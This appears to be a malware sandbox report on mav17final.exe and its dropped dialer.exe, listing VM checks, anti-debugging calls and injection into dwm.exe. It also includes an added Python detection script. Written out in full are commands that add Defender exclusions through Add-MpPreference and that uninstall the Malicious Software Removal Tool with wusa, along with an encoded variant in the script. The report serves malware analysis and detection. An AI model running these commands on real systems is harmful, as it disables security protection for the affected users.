      Source: mav17final.exe, 00000002.00000003.2002994495.00000187194F3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: "vmwaretray.exe",
      Source: dialer.exe, 00000009.00000003.2079395803.000001C5D4620000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: vmwaretray.exe
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2042899107.000001871B017000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000009.00000002.2080504239.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000000.2044022692.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000003.2079395803.000001C5D4620000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: vmusrvc.exe
      Source: mav17final.exe, 00000002.00000003.2002994495.00000187194F3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: "vmwareuser.exe",
      Source: dialer.exe, 00000009.00000003.2079395803.000001C5D4620000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: vmtoolsd.exe
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2042899107.000001871B017000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000009.00000002.2080504239.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000000.2044022692.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000003.2079395803.000001C5D4620000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: qemu-ga.exe
      Source: mav17final.exe, 00000002.00000003.2041722275.0000018717654000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2053285690.0000018717615000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2056333676.0000018717657000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000002.2062883775.0000018717657000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2054935651.0000018717628000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2033297099.0000018717654000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2058925754.0000018717657000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2058925754.0000018717629000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2051313400.0000018717657000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2058801834.0000018717629000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vboxtray.exe0
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vmsrvc.exep
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: "vmtoolsd.exe"
      Source: mav17final.exe, 00000002.00000003.2002994495.00000187194F3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: "vmtoolsd.exe",
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: "vboxtray.exe"
      Source: dialer.exe, 00000009.00000003.2079395803.000001C5D4620000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: vmwareuser.exe
      Source: mav17final.exe, 00000002.00000003.1998679602.000001871972D000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2043930165.0000018718E2A000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2002994495.00000187194F3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: "vmusrvc.exe",
      Source: mav17final.exe, 00000002.00000003.1998679602.000001871972D000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2043930165.0000018718E2A000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2002994495.00000187194F3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: "qemu-ga.exe",
      Source: mav17final.exe, 00000002.00000003.2002994495.00000187194F3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: "vmsrvc.exe",
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: "vmsrvc.exe"
      Source: mav17final.exe, 00000002.00000003.1998679602.000001871972D000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2043930165.0000018718E2A000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2002994495.00000187194F3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: "vboxtray.exe",
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: "vmusrvc.exe"
      Source: mav17final.exe, 00000002.00000003.2002994495.00000187194F3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: "vboxservice.exe",
      Source: dialer.exe, 00000009.00000003.2079395803.000001C5D4620000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: vmsrvc.exe
      Source: mav17final.exe, 00000002.00000003.2042899107.000001871B017000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000009.00000002.2080504239.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000000.2044022692.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000003.2079395803.000001C5D4620000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: ]\utsrqponmlkjihgfSRQPONMLKJIHGFEDCBA@?>=<;:9876543210/.-,
      Source: dialer.exe, 00000009.00000003.2079395803.000001C5D4620000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: vboxservice.exe
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: "qemu-ga.exe"
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: "vboxservice.exe"
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vmusrvc.exep
      Source: C:\Windows\System32\dwm.exe API call chain: ExitProcess graph end node
      Source: C:\Users\user\Desktop\mav17final.exe Process information queried: ProcessInformation
      Source: C:\Users\user\Desktop\mav17final.exe Code function: 0_2_00007FF79EA565B4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF79EA565B4
      Source: C:\Users\user\Desktop\mav17final.exe Code function: 2_2_00007FF8B9071270 LoadLibraryA,GetProcAddress,FreeLibrary,2_2_00007FF8B9071270
      Source: C:\Users\user\Desktop\mav17final.exe Code function: 0_2_00007FF79EA5EE60 GetProcessHeap,0_2_00007FF79EA5EE60
      Source: C:\Users\user\Desktop\mav17final.exe Process token adjusted: Debug
      Source: C:\Users\user\Desktop\mav17final.exe Process token adjusted: Debug
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
      Source: C:\Users\user\Desktop\mav17final.exe Code function: 0_2_00007FF79EA565B4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF79EA565B4
      Source: C:\Users\user\Desktop\mav17final.exe Code function: 0_2_00007FF79EA4C690 SetUnhandledExceptionFilter,0_2_00007FF79EA4C690
      Source: C:\Users\user\Desktop\mav17final.exe Code function: 0_2_00007FF79EA4BC10 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF79EA4BC10
      Source: C:\Users\user\Desktop\mav17final.exe Code function: 0_2_00007FF79EA4C4AC IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF79EA4C4AC
      Source: C:\Users\user\Desktop\mav17final.exe Code function: 2_2_00007FF8B907A000 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FF8B907A000
      Source: C:\Users\user\Desktop\mav17final.exe Code function: 2_2_00007FF8B907A928 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF8B907A928
      Source: C:\Users\user\Desktop\mav17final.exe Code function: 2_2_00007FF8B90A35E0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FF8B90A35E0
      Source: C:\Users\user\Desktop\mav17final.exe Code function: 2_2_00007FF8B90A3BB0 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF8B90A3BB0
      Source: C:\Users\user\Desktop\mav17final.exe Code function: 2_2_00007FF8B90CA090 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FF8B90CA090
      Source: C:\Users\user\Desktop\mav17final.exe Code function: 2_2_00007FF8B90CAAD8 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF8B90CAAD8
      Source: C:\Users\user\Desktop\mav17final.exe Code function: 2_2_00007FF8B93C2600 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FF8B93C2600
      Source: C:\Users\user\Desktop\mav17final.exe Code function: 2_2_00007FF8B93C2BC0 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF8B93C2BC0
      Source: C:\Users\user\Desktop\mav17final.exe Code function: 2_2_00007FF8B9841B00 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF8B9841B00
      Source: C:\Users\user\Desktop\mav17final.exe Code function: 2_2_00007FF8B9841530 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FF8B9841530
      Source: C:\Users\user\Desktop\mav17final.exe Code function: 2_2_00007FF8B9F66254 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF8B9F66254
      Source: C:\Users\user\Desktop\mav17final.exe Code function: 2_2_00007FF8B9F65CB0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FF8B9F65CB0
      Source: C:\Users\user\Desktop\mav17final.exe Code function: 2_2_00007FF8BA250468 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FF8BA250468
      Source: C:\Users\user\Desktop\mav17final.exe Code function: 2_2_00007FF8BFAB52F0 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF8BFAB52F0
      Source: C:\Users\user\Desktop\mav17final.exe Code function: 2_2_00007FF8BFAB4D20 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FF8BFAB4D20
      Source: C:\Windows\System32\conhost.exe Code function: 64_2_0000000140001160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,64_2_0000000140001160

      HIPS / PFW / Operating System Protection Evasion

      Source: C:\Users\user\Desktop\mav17final.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force"
      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      Source: C:\Users\user\AppData\Local\Temp\dialer.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      Source: C:\ProgramData\dialer.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      Source: C:\Users\user\Desktop\mav17final.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force"
      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      Source: C:\Users\user\AppData\Local\Temp\dialer.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      Source: C:\ProgramData\dialer.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      Source: C:\ProgramData\dialer.exe Thread register set: target process: 5952
      Source: C:\ProgramData\dialer.exe Thread register set: target process: 2804
      Source: C:\Users\user\Desktop\mav17final.exe Process created: C:\Users\user\Desktop\mav17final.exe "C:\Users\user\Desktop\mav17final.exe"
      Source: C:\Users\user\Desktop\mav17final.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force"
      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\dialer.exe C:\Users\user\AppData\Local\Temp\dialer.exe
      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
      Source: C:\ProgramData\dialer.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe
      Source: C:\ProgramData\dialer.exe Process created: C:\Windows\System32\dwm.exe dwm.exe
      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
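      The process-creation rows above give four conditions a detection rule can key on: Add-MpPreference adding a path and extension exclusion to Defender (once wrapped in cmd.exe /c, once called directly by dialer.exe); wusa.exe uninstalling KB890830, which is the Malicious Software Removal Tool; a copy of the System32 binary dialer.exe running from C:\ProgramData and %TEMP%; and the real C:\Windows\System32\dwm.exe being started by that dialer.exe (normally dwm.exe is started by winlogon.exe), which is the host the "Thread register set" entries then inject into. The following is an added example, not code from Joe Sandbox, Sigma or the sample: it evaluates Sysmon-style process-creation records (Event ID 1 field names Image, ParentImage, CommandLine) against those four conditions and also decodes a PowerShell -EncodedCommand argument first, so the base64-wrapped variant that the report's "Powershell Base64 Encoded MpPreference Cmdlet" Sigma match refers to is caught by the same rule. The event records are constructed from the command lines shown in the report, not taken from its full log.

```python
"""Flag the Defender-exclusion, MSRT-removal and LOLBin-masquerade behaviour
seen in the report from process-creation events.

Added example (not Joe Sandbox's, Sigma's or the sample's code).  The
events below are constructed to mirror the report's command lines.
"""
import base64
import ntpath
import re

SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
# System32 binaries the sample drops copies of / abuses as injection hosts
MASQUERADE_NAMES = {"dialer.exe", "dwm.exe", "conhost.exe", "svchost.exe", "explorer.exe"}
ENCODED_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(cmdline: str) -> str:
    """Return the decoded -EncodedCommand payload (UTF-16LE base64) if present, else the raw line."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return cmdline
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return cmdline                      # not a valid payload; judge the raw line instead


def evaluate(event: dict) -> list:
    """Return the names of the rules the event matches (empty list if benign)."""
    image = event["Image"].lower()
    parent = event.get("ParentImage", "").lower()
    name = ntpath.basename(image)
    cmd = decode_encoded_command(event.get("CommandLine", "")).lower()
    hits = []
    # 1. Defender exclusion added or changed (Add-/Set-MpPreference with any -Exclusion* switch)
    if re.search(r"(add|set)-mppreference", cmd) and "-exclusion" in cmd:
        hits.append("defender_exclusion_added")
    # 2. KB890830 (Malicious Software Removal Tool) removed through wusa.exe
    if name == "wusa.exe" and "/uninstall" in cmd and "kb:890830" in cmd:
        hits.append("msrt_uninstall_via_wusa")
    # 3. A System32 binary's name running from outside System32/SysWOW64
    if name in MASQUERADE_NAMES and not image.startswith(SYSTEM_DIRS):
        hits.append("system_binary_name_outside_system32")
    # 4. The genuine dwm.exe started by something that is not a Windows system binary
    if name == "dwm.exe" and image.startswith(SYSTEM_DIRS) and not parent.startswith(SYSTEM_DIRS):
        hits.append("dwm_spawned_by_untrusted_parent")
    return hits


def scan(events: list) -> list:
    """Evaluate every event; return [{'index', 'image', 'hits'}] for those that matched."""
    return [{"index": i, "image": ev["Image"], "hits": evaluate(ev)}
            for i, ev in enumerate(events) if evaluate(ev)]


# Constructed base64 -EncodedCommand payload carrying the same cmdlet
ENCODED = base64.b64encode(
    "Add-MpPreference -ExclusionPath $env:ProgramData -Force".encode("utf-16-le")).decode()

# Constructed events mirroring the report's process tree (not its raw log)
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Users\user\Desktop\mav17final.exe",
     "CommandLine": r'''C:\Windows\system32\cmd.exe /c "powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force"'''},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\ProgramData\dialer.exe",
     "CommandLine": "powershell.exe -EncodedCommand " + ENCODED},
    {"Image": r"C:\Windows\System32\wusa.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "wusa /uninstall /kb:890830 /quiet /norestart"},
    {"Image": r"C:\ProgramData\dialer.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"C:\ProgramData\dialer.exe"},
    {"Image": r"C:\Windows\System32\dwm.exe",
     "ParentImage": r"C:\ProgramData\dialer.exe",
     "CommandLine": "dwm.exe"},
    {"Image": r"C:\Windows\System32\notepad.exe",        # benign control
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "notepad.exe"},
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(f"event {finding['index']}: {finding['image']} -> {', '.join(finding['hits'])}")
```

      Rule 3 is the one most likely to need tuning: dialer.exe, dwm.exe and conhost.exe should never execute from ProgramData or a user's Temp directory, but an environment with legitimate relocated copies (recovery media, some deployment tools) will need those paths allow-listed. Rule 1 deliberately matches Set-MpPreference as well as Add-MpPreference, since either can blind Defender to the dropped directories, and once a match fires the exclusion list itself (Get-MpPreference on the host) is what tells you which paths were opened up and need to be removed.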
      Source: C:\Users\user\Desktop\mav17final.exe Code function: 0_2_00007FF79EA64EF0 cpuid 0_2_00007FF79EA64EF0
      Source: C:\Users\user\Desktop\mav17final.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\base_library.zip VolumeInformation
      Source: C:\Users\user\Desktop\mav17final.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\base_library.zip VolumeInformation
      Source: C:\Users\user\Desktop\mav17final.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\base_library.zip VolumeInformation
      Source: C:\Users\user\Desktop\mav17final.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\base_library.zip VolumeInformation
      Source: C:\Users\user\Desktop\mav17final.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\base_library.zip VolumeInformation
      Source: C:\Users\user\Desktop\mav17final.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\base_library.zip VolumeInformation
      Source: C:\Users\user\Desktop\mav17final.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\base_library.zip VolumeInformation
      Source: C:\Users\user\Desktop\mav17final.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\base_library.zip VolumeInformation
      Source: C:\Users\user\Desktop\mav17final.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\base_library.zip VolumeInformation
      Source: C:\Users\user\Desktop\mav17final.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\base_library.zip VolumeInformation
      Source: C:\Users\user\Desktop\mav17final.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\base_library.zip VolumeInformation
      Source: C:\Users\user\Desktop\mav17final.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\base_library.zip VolumeInformation
      Source: C:\Users\user\Desktop\mav17final.exe Queries volume information: C:\Users\user\Desktop\mav17final.exe VolumeInformation
      Source: C:\Users\user\Desktop\mav17final.exe Queries volume information: C:\Users\user\Desktop\mav17final.exe VolumeInformation
      Source: C:\Users\user\Desktop\mav17final.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\base_library.zip VolumeInformation
      Source: C:\Users\user\Desktop\mav17final.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\base_library.zip VolumeInformation
      Source: C:\Users\user\Desktop\mav17final.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682 VolumeInformation
      Source: C:\Users\user\Desktop\mav17final.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682 VolumeInformation
      Source: C:\Users\user\Desktop\mav17final.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682 VolumeInformation
      Source: C:\Users\user\Desktop\mav17final.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682 VolumeInformation
      Source: C:\Users\user\Desktop\mav17final.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\_ctypes.pyd VolumeInformation
      Source: C:\Users\user\Desktop\mav17final.exe Queries volume information: C:\Users\user\Desktop\mav17final.exe VolumeInformation
      Source: C:\Users\user\Desktop\mav17final.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682 VolumeInformation
      Source: C:\Users\user\Desktop\mav17final.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\base_library.zip VolumeInformation
      Source: C:\Users\user\Desktop\mav17final.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\libcrypto-1_1.dll VolumeInformation
      Source: C:\Users\user\Desktop\mav17final.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\libffi-8.dll VolumeInformation
      Source: C:\Users\user\Desktop\mav17final.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\libssl-1_1.dll VolumeInformation
      Source: C:\Users\user\Desktop\mav17final.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\psutil VolumeInformation
      Source: C:\Users\user\Desktop\mav17final.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\pyexpat.pyd VolumeInformation
      Source: C:\Users\user\Desktop\mav17final.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\python311.dll VolumeInformation
      Source: C:\Users\user\Desktop\mav17final.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\unicodedata.pyd VolumeInformation
      Source: C:\Users\user\Desktop\mav17final.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\_elementtree.pyd VolumeInformation
      Source: C:\Users\user\Desktop\mav17final.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\_lzma.pyd VolumeInformation
      Source: C:\Users\user\Desktop\mav17final.exe Queries volume information: C:\Users\user\Desktop\mav17final.exe VolumeInformation
      Source: C:\Users\user\Desktop\mav17final.exe Queries volume information: C:\Users\user\Desktop\mav17final.exe VolumeInformation
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\Desktop\mav17final.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\Desktop\mav17final.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\Desktop\mav17final.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\Desktop\mav17final.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\Desktop\mav17final.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\base_library.zip VolumeInformationJump to behavior
